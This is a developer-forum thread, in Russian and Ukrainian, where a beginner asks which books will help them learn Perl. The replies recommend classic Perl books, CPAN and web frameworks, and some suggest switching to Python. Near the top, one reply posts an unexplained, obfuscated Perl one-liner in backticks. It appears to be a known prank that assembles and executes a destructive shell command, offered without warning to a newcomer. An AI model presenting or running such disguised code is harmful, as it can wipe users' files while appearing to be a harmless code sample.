Сучасна диджитал-освіта для дітей — безоплатне заняття в GoITeens ×
Mazda CX 5
×

Учу перл

Попался под руку тренинг Программирование на Перл. Написанно что планируемое время — 3 часа. В реале это все вылилось в 9 часов слушания тетки, выполнения упражнений и прохождения тестов. И вот теперь я типа могу читать любой код перл и даже мучать перлом sql. Но как то не прочувствовал и хочется закрепить знания какой нибудь прочитанной книжкой с множеством примеров. Поиск по слову PERL на доу ничего не показал, поэтому и решил создать эту тему.

Подскажите путь для джуниора в перле — что читать что бы улучшить знания ?

👍ПодобаєтьсяСподобалось0
До обраногоВ обраному0
LinkedIn
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter

`$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@%)=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`

def holiwar():
    print('Учите %s' % 'python')

holiwar()

братюнь но я бы на твоем месте сильно не увлекался. проектов на нам очень очень мало, учи руби что ли. Тот даже чем то похож только сделан не аутистами для аутистов

не слушайте их всех :)
кук-бук (баран) + кемел-бук (верблюд) + желание
cpan, moo/moose, dbic, psgi/plack, catalyst(?)
ru.perlmaven.com/pomosch

catalyst(?)

Лучше Mojolicious.

кук-бук (баран) + кемел-бук (верблюд) + желание
Почувствуй себя овцебыком :)
//стёб — ибо сама по этим же книжкам учила. Только вторая книжка вроде как с ламой, а не бараном?

:(
и гиде бы взять барана и тёмную ламу? :(

на торрентах, вестимо (имхо и на русском есть)
печатные продавались давно, мой экземпляр барана — от 2000 года
наверняка в продаже их уже нет и не будет

поэтому бараном наврено не стоит страдать, уж больно стар.

не соглашусь
баран как раз хорошо показывает TIMTOWTDI
верблюд же дает углубленное понимание
имхо этих двух книг необходимо и достаточно чтоб получить достойного перловика
а всякие ламы — школьный уровень

выложите кусок своего кода — хочу заценить код достойного перловика ))) На рутрекере есть выложененная книга по перл издания 2000 года, в комментах ктото описался — «те 900 людей скачавшие эту книгу реально думают что за 12 лет ничего не поменялось ?». Ему правда достойно возразили — «книга по С ьыла написанна Ричи 25 лет назад, и все равно остается номер один по С». Но я склоняюсь к мнению что за 12 лет таки что то поменялось и поэтому не качал ее. Кстати что такое

TIMTOWTDI
?

не надо меня заценивать, я сегодня стеснителен выше обычного :)
«достойный» — это не тот кто пишет хрестоматийный код, а тот кто решает поставленные задачи

странно что перл-гуру оказалось всего 4 человека

да вон букинг перл людей набирает постоянно

Последние N лет проекты на Perl — в основном legacy.
Рассмотрите Python.

так само можна сказати і про більшість мов програмування ))
Є декілька цікавих нових фреймворків (класика — Catalyst )) ), н-д Mojolicious,Dancer тощо.
Щодо Python — порада слушна.

Не слухайте тут тих хто каже фуу. Подобається вам гратися з Perl-ом — грайтеся. Як мінімум чогось навчитесь, як максимум посадять за підтримку якогось старого проекту. Ви ж не збираєтесь все життя присвятити одній мові програмування. А знання завжди можуть пригодитися.

Поріг входження на Perl досить високий. Я пишу про справжній Perl, а не програмування на псевдомові, яку можна використовувати незалежно но від мови програмування

На сегодняшний день чем перл учить, уж всяко выгоднее изучить РПГ-18, что-ли.
Не сочтите за трололо.

я вообще его не собирался учить, подкупило что за 3и часа можна освоить.

пока что ничего сложного в перле не заметил. Немного напрягло постоянные передачи по указателям и «тройная растаможка» Н-ного элемента массива указателей на указатели, но это в принипе решаемо. хотя может я просто не дошел до какието уложнений.

пока что ничего сложного в перле не заметил
чужой перл-код читать пробовал ? :)

Когда я крайний раз читал чужой Perl код, он оказался аккуратным и поэтому понятным.
Правда, мне не пришлось его пилить, надо было просто понять, что там в принципе делается.

очень валидный коммент, чувак их Стендфорда который читал курс по яве на ютьюбе, на первом или втором занятии всем студентам объяснил что поддержка кода является в настоящее время более оплачиваемой и более трудоемкой работой чем написание кода, поэтому одна из его задач — это выпускать студентов которые пишут читаемый код снабженный комментариями и который можно переиспользовать. 30% балла в курсе — за читаемость кода и комментарии.

Должен быть не только код аккуратным, но и архитектура.
Необоснованное раскидывание функциональности по чрезмерно длинной и разветвлённой иерархии классов надо пресекать.

«Изучаем Perl», «Изучаем Perl глубже», обязательно читать чужой код (с cpan, например). Затем уже переходить к серьезной практике: кукбук, «Программируем на Perl», «Higher-Order Perl».

научись работать с cpan

Коментар порушує правила спільноти і видалений модераторами.

Підписатись на коментарі